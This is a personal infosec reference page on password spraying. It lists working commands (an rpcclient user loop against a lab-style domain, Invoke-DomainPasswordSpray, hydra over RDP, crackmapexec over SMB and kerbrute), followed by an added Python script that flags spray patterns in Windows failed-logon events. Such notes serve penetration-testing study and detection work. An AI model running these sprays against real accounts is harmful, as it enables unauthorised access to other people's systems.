akde/infosec

Information security is ultimately about managing risk


Password spraying: Try a few passwords against a large set of users.

Manual

for u in Administrator Guest krbtgt DefaultAccount ryan marko sunita abigail marcus sally fred angela felicia gustavo ulf stevie claire paulo steve annette annika per claude melanie zach simon naoki; do rpcclient -W MEGABANK -U $u 10.10.10.169; done;

With PowerShell

Download DomainPasswordSpray and upload it to the target. Then execute:

PS> Invoke-DomainPasswordSpray -Password Test123

With Hydra

hydra -L /usr/share/wordlists/dirb/others/names.txt -p "RetrievedSuperSecurePassword" rdp://$target

With crackmapexec (against SMB shares)

  1. Create a list of users, e.g. users.txt:
    tom
    jerry
  2. Execute crackmapexec with one password:
    crackmapexec smb $target -u users.txt -p 'Password123' --continue-on-success [-d ad.dom]

With kerbrute

On Linux:

python kerbrute.py …

On Windows, download it from GitHub.

  1. Create a list of users, e.g. users.txt:
    tom
    jerry
  2. Execute kerbrute with one password:
    kerbrute_windows_amd64.exe passwordspray -d dom.ain users.txt "Pass123"
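
Detection side of the runs above, as an added example that is not part of the original notes: a spray shows up as one source failing once or twice against many distinct accounts in a short window. The event tuple layout, the thresholds and the sample events are assumptions constructed for illustration; 4625 and 4771 are the Windows Security log IDs for a failed logon and a failed Kerberos pre-authentication.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAILURE_IDS = {4625, 4771}  # failed logon, Kerberos pre-authentication failed

def _ts(second):
    return f"2024-01-01T09:00:{second:02d}"

# Constructed sample events: (timestamp, event_id, source_ip, username).
SAMPLE_EVENTS = (
    # One source, one failure each against six accounts: the spray pattern.
    [(_ts(i * 5), 4771, "10.0.0.50", u) for i, u in
     enumerate(["tom", "jerry", "ryan", "marko", "sunita", "abigail"])]
    # One source hammering a single account: brute force, not a spray.
    + [(_ts(i), 4625, "10.0.0.7", "fred") for i in range(8)]
    # An ordinary typo followed by a successful logon (4624 is ignored).
    + [(_ts(10), 4625, "10.0.0.9", "sally"), (_ts(20), 4624, "10.0.0.9", "sally")]
)

def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Return {source_ip: sorted usernames} for sources whose failures look like a spray."""
    by_source = defaultdict(list)
    for ts, event_id, src, user in events:
        if event_id in FAILURE_IDS:
            by_source[src].append((datetime.fromisoformat(ts), user.lower()))
    findings = {}
    for src, fails in by_source.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Slide the window so it never spans more than `window` of time.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            counts = defaultdict(int)
            for _, user in fails[start:end + 1]:
                counts[user] += 1
            # Many distinct accounts, few attempts per account.
            wide = len(counts) >= min_users and max(counts.values()) <= max_per_user
            if wide and len(counts) > len(findings.get(src, [])):
                findings[src] = sorted(counts)
    return findings

if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {src}: {len(users)} accounts {users}")
```

Set window and min_users with the domain's lockout observation window in mind, since a spray is paced to stay under it.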


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
